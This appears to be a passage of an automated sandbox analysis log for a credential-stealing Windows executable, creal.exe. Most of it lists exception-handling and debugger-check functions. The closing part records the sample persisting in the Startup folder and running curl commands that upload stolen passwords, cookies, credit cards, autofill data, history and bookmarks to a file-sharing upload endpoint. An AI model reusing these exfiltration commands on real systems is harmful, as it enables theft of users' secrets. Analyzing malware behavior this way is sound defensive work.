            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F21960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E6F21960
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F31390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E6F31390
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F31960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E6F31960
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F41390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E6F41390
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F41960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E6F41960
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F51390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E6F51390
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F51960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E6F51960
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F61390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E6F61390
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F61960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E6F61960
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F71390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E6F71390
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F71960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E6F71960
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F81390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E6F81390
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F81960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E6F81960
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F91390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E6F91390
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F91960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E6F91960
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6FA1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E6FA1390
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6FA1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E6FA1960
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6FB1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E6FB1390
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6FB1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E6FB1960
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6FC1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E6FC1390
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6FC1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E6FC1960
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6FD1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E6FD1390
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6FD1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E6FD1960
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6FE1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E6FE1390
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6FE1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E6FE1960
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6FF1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E6FF1390
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6FF1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E6FF1960
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E700BEA0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E700BEA0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E700B8D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E700B8D0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E7023068 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E7023068
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E7022AA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E7022AA0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71542E8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E71542E8
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E7153D20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E7153D20
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E7174660 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E7174660
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E7174090 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E7174090
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71A0038 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E71A0038
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E719FA70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E719FA70
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CFACD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00007FF7C3CFACD8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CEC860 SetUnhandledExceptionFilter,26_2_00007FF7C3CEC860
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CEC67C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00007FF7C3CEC67C
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CEBDE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00007FF7C3CEBDE0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E5A9ABE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8E5A9ABE0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E5AE3068 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00007FF8E5AE3068
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E5AE2AA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8E5AE2AA0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E8031A30 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00007FF8E8031A30
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E8031460 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8E8031460
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F3F31390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8F3F31390
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F3F31960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00007FF8F3F31960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F6FA1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8F6FA1390
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F6FA1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00007FF8F6FA1960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F7A01390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8F7A01390
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F7A01960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00007FF8F7A01960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F7A91390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8F7A91390
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F7A91960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00007FF8F7A91960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F7AA1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8F7AA1390
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F7AA1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00007FF8F7AA1960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F7EC1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00007FF8F7EC1960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F7EC1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8F7EC1390
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8301390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8F8301390
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8301960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00007FF8F8301960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8361960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00007FF8F8361960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8361390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8F8361390
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8371960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00007FF8F8371960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8371390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8F8371390
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8381960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00007FF8F8381960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8381390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8F8381390
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8391960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00007FF8F8391960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8391390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8F8391390
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F83AB8D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8F83AB8D0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F83ABEA0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00007FF8F83ABEA0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F83D3D20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8F83D3D20
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F83D42E8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00007FF8F83D42E8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F83F1A00 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00007FF8F83F1A00
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F83F1430 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8F83F1430
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8404660 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00007FF8F8404660
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8404090 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8F8404090
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F842FA70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8F842FA70
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8430038 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00007FF8F8430038
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84619D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8F84619D0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8461FA0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00007FF8F8461FA0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84721F0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00007FF8F84721F0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8471C20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8F8471C20
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8492135 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00007FF8F8492135
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8FF5B52F0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00007FF8FF5B52F0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8FF5C5FA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF8FF5C5FA0
            Source: C:\Users\user\Desktop\creal.exeProcess created: C:\Users\user\Desktop\creal.exe "C:\Users\user\Desktop\creal.exe"Jump to behavior
            Source: C:\Users\user\Desktop\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Users\user\Desktop\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"Jump to behavior
            Source: C:\Users\user\Desktop\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"Jump to behavior
            Source: C:\Users\user\Desktop\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"Jump to behavior
            Source: C:\Users\user\Desktop\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"Jump to behavior
            Source: C:\Users\user\Desktop\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"Jump to behavior
            Source: C:\Users\user\Desktop\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFileJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFileJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFileJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFileJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFileJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFileJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe" Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
